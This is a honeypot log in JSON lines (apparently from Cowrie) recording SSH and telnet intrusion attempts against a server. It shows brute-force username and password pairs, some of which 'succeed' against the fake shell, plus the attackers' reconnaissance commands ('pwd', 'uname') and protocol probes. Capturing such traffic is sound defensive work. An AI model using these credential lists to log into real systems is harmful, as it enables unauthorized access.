{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:42:59.232427Z","src_ip":"185.93.89.7","session":"eb412892214d"}
{"eventid":"cowrie.session.closed","duration":46.12298369407654,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:42:59.600227Z","src_ip":"212.227.125.160","session":"160487ea0786"}
{"eventid":"cowrie.login.success","username":"root","password":"0987654321","message":"login attempt [root/0987654321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:43:01.164383Z","src_ip":"186.225.142.90","session":"dfb9bdd2aaef"}
{"eventid":"cowrie.session.closed","duration":46.149249792099,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:01.603410Z","src_ip":"123.31.39.100","session":"f718db336159"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":37786,"dst_ip":"1.2.3.4","dst_port":22,"session":"36bf8bc64c4a","protocol":"ssh","message":"New connection: 51.79.164.132:37786 (1.2.3.4:22) [session: 36bf8bc64c4a]","sensor":"my-vps","timestamp":"2025-08-28T09:43:02.747751Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:43:02.929031Z","src_ip":"186.225.142.90","session":"dfb9bdd2aaef"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T09:43:02.929964Z","src_ip":"186.225.142.90","session":"dfb9bdd2aaef"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:43:03.021599Z","src_ip":"51.79.164.132","session":"36bf8bc64c4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:43:03.022719Z","src_ip":"51.79.164.132","session":"36bf8bc64c4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:03.702573Z","src_ip":"186.225.142.90","session":"dfb9bdd2aaef"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:04.152676Z","src_ip":"186.225.142.90","session":"dfb9bdd2aaef"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":39548,"dst_ip":"1.2.3.4","dst_port":22,"session":"f32ce5477086","protocol":"ssh","message":"New connection: 139.19.117.131:39548 (1.2.3.4:22) [session: f32ce5477086]","sensor":"my-vps","timestamp":"2025-08-28T09:43:06.274059Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:43:06.274799Z","src_ip":"139.19.117.131","session":"f32ce5477086"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T09:43:06.291699Z","src_ip":"139.19.117.131","session":"f32ce5477086"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"6d:05:de:1d:94:f4:4c:f6:92:7c:18:21:fa:9c:88:70","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBTdKtwM0nNYabAq3tbWhGy6BELVnwQXZL4m+PidJ01o","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 6d:05:de:1d:94:f4:4c:f6:92:7c:18:21:fa:9c:88:70","sensor":"my-vps","timestamp":"2025-08-28T09:43:06.327308Z","src_ip":"139.19.117.131","session":"f32ce5477086"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"6d:05:de:1d:94:f4:4c:f6:92:7c:18:21:fa:9c:88:70","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBTdKtwM0nNYabAq3tbWhGy6BELVnwQXZL4m+PidJ01o","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T09:43:06.328065Z","src_ip":"139.19.117.131","session":"f32ce5477086"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:43:06.359289Z","src_ip":"51.79.164.132","session":"36bf8bc64c4a"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:08.057690Z","src_ip":"51.79.164.132","session":"36bf8bc64c4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40612,"dst_ip":"1.2.3.4","dst_port":23,"session":"bf37363734d7","protocol":"telnet","message":"New connection: 212.227.235.229:40612 (1.2.3.4:23) [session: bf37363734d7]","sensor":"my-vps","timestamp":"2025-08-28T09:43:14.691045Z"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:16.274448Z","src_ip":"139.19.117.131","session":"f32ce5477086"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":50098,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ca1a5b99330","protocol":"ssh","message":"New connection: 185.93.89.7:50098 (1.2.3.4:22) [session: 3ca1a5b99330]","sensor":"my-vps","timestamp":"2025-08-28T09:43:21.856897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:43:21.857997Z","src_ip":"185.93.89.7","session":"3ca1a5b99330"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:43:21.875247Z","src_ip":"185.93.89.7","session":"3ca1a5b99330"}
{"eventid":"cowrie.login.failed","username":"index","password":"1q2w3e4r5t","message":"login attempt [index/1q2w3e4r5t] failed","sensor":"my-vps","timestamp":"2025-08-28T09:43:21.928493Z","src_ip":"185.93.89.7","session":"3ca1a5b99330"}
{"eventid":"cowrie.session.closed","duration":7.98685359954834,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:22.677831Z","src_ip":"212.227.235.229","session":"bf37363734d7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:22.948858Z","src_ip":"185.93.89.7","session":"3ca1a5b99330"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:23.836195Z","src_ip":"212.227.235.229","session":"c95a7ee0e00c"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":41622,"dst_ip":"1.2.3.4","dst_port":22,"session":"6896bcd3ffb0","protocol":"ssh","message":"New connection: 51.79.164.132:41622 (1.2.3.4:22) [session: 6896bcd3ffb0]","sensor":"my-vps","timestamp":"2025-08-28T09:43:28.531074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:43:28.894684Z","src_ip":"51.79.164.132","session":"6896bcd3ffb0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:43:28.895437Z","src_ip":"51.79.164.132","session":"6896bcd3ffb0"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:43:30.905998Z","src_ip":"51.79.164.132","session":"6896bcd3ffb0"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:32.415069Z","src_ip":"51.79.164.132","session":"6896bcd3ffb0"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":36271,"dst_ip":"1.2.3.4","dst_port":23,"session":"bb8a7c280271","protocol":"telnet","message":"New connection: 157.230.111.73:36271 (1.2.3.4:23) [session: bb8a7c280271]","sensor":"my-vps","timestamp":"2025-08-28T09:43:37.269787Z"}
{"eventid":"cowrie.session.closed","duration":0.0011894702911376953,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:37.270892Z","src_ip":"157.230.111.73","session":"bb8a7c280271"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":10369,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e7542ff76f5","protocol":"telnet","message":"New connection: 157.230.111.73:10369 (1.2.3.4:23) [session: 5e7542ff76f5]","sensor":"my-vps","timestamp":"2025-08-28T09:43:37.440331Z"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T09:43:43.445458Z","src_ip":"157.230.111.73","session":"5e7542ff76f5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":40102,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc968f8b1471","protocol":"ssh","message":"New connection: 185.93.89.7:40102 (1.2.3.4:22) [session: dc968f8b1471]","sensor":"my-vps","timestamp":"2025-08-28T09:43:45.816954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:43:45.838814Z","src_ip":"185.93.89.7","session":"dc968f8b1471"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:43:45.840375Z","src_ip":"185.93.89.7","session":"dc968f8b1471"}
{"eventid":"cowrie.login.failed","username":"index","password":"zaq12wsx","message":"login attempt [index/zaq12wsx] failed","sensor":"my-vps","timestamp":"2025-08-28T09:43:45.972700Z","src_ip":"185.93.89.7","session":"dc968f8b1471"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:47.002916Z","src_ip":"185.93.89.7","session":"dc968f8b1471"}
{"eventid":"cowrie.session.closed","duration":11.008683919906616,"message":"Connection lost after 11 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:48.448945Z","src_ip":"157.230.111.73","session":"5e7542ff76f5"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":1601,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f819a266177","protocol":"telnet","message":"New connection: 157.230.111.73:1601 (1.2.3.4:23) [session: 9f819a266177]","sensor":"my-vps","timestamp":"2025-08-28T09:43:48.459627Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53292,"dst_ip":"1.2.3.4","dst_port":22,"session":"87c1cc43063e","protocol":"ssh","message":"New connection: 217.72.205.35:53292 (1.2.3.4:22) [session: 87c1cc43063e]","sensor":"my-vps","timestamp":"2025-08-28T09:43:52.561436Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:52.562807Z","src_ip":"217.72.205.35","session":"87c1cc43063e"}
{"eventid":"cowrie.session.closed","duration":5.005070686340332,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:53.464589Z","src_ip":"157.230.111.73","session":"9f819a266177"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":20423,"dst_ip":"1.2.3.4","dst_port":23,"session":"97f318914ed2","protocol":"telnet","message":"New connection: 157.230.111.73:20423 (1.2.3.4:23) [session: 97f318914ed2]","sensor":"my-vps","timestamp":"2025-08-28T09:43:53.474967Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.0","password":"","message":"login attempt [GET / HTTP/1.0/] failed","sensor":"my-vps","timestamp":"2025-08-28T09:43:53.475940Z","src_ip":"157.230.111.73","session":"97f318914ed2"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":53730,"dst_ip":"1.2.3.4","dst_port":22,"session":"16a404502960","protocol":"ssh","message":"New connection: 51.79.164.132:53730 (1.2.3.4:22) [session: 16a404502960]","sensor":"my-vps","timestamp":"2025-08-28T09:43:54.856057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:43:54.982820Z","src_ip":"51.79.164.132","session":"16a404502960"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:43:55.566800Z","src_ip":"51.79.164.132","session":"16a404502960"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:43:56.936407Z","src_ip":"51.79.164.132","session":"16a404502960"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:43:58.642028Z","src_ip":"51.79.164.132","session":"16a404502960"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:43:58.642764Z","src_ip":"51.79.164.132","session":"16a404502960"}
{"eventid":"cowrie.session.closed","duration":5.169396162033081,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:58.644292Z","src_ip":"157.230.111.73","session":"97f318914ed2"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":10539,"dst_ip":"1.2.3.4","dst_port":23,"session":"2dff24fe5d18","protocol":"telnet","message":"New connection: 157.230.111.73:10539 (1.2.3.4:23) [session: 2dff24fe5d18]","sensor":"my-vps","timestamp":"2025-08-28T09:43:58.645167Z"}
{"eventid":"cowrie.login.failed","username":"OPTIONS / HTTP/1.0","password":"","message":"login attempt [OPTIONS / HTTP/1.0/] failed","sensor":"my-vps","timestamp":"2025-08-28T09:43:58.646047Z","src_ip":"157.230.111.73","session":"2dff24fe5d18"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:58.833834Z","src_ip":"51.79.164.132","session":"16a404502960"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:43:58.834975Z","src_ip":"51.79.164.132","session":"16a404502960"}
{"eventid":"cowrie.session.closed","duration":4.851345777511597,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:03.496440Z","src_ip":"157.230.111.73","session":"2dff24fe5d18"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":14377,"dst_ip":"1.2.3.4","dst_port":23,"session":"343156f2d06f","protocol":"telnet","message":"New connection: 157.230.111.73:14377 (1.2.3.4:23) [session: 343156f2d06f]","sensor":"my-vps","timestamp":"2025-08-28T09:44:03.506619Z"}
{"eventid":"cowrie.login.failed","username":"OPTIONS / RTSP/1.0","password":"","message":"login attempt [OPTIONS / RTSP/1.0/] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:03.508107Z","src_ip":"157.230.111.73","session":"343156f2d06f"}
{"eventid":"cowrie.session.closed","duration":5.005462169647217,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:08.512023Z","src_ip":"157.230.111.73","session":"343156f2d06f"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":14055,"dst_ip":"1.2.3.4","dst_port":23,"session":"5c318468b70c","protocol":"telnet","message":"New connection: 157.230.111.73:14055 (1.2.3.4:23) [session: 5c318468b70c]","sensor":"my-vps","timestamp":"2025-08-28T09:44:08.522462Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":41722,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d3891c348f2","protocol":"ssh","message":"New connection: 185.93.89.7:41722 (1.2.3.4:22) [session: 2d3891c348f2]","sensor":"my-vps","timestamp":"2025-08-28T09:44:12.200026Z"}
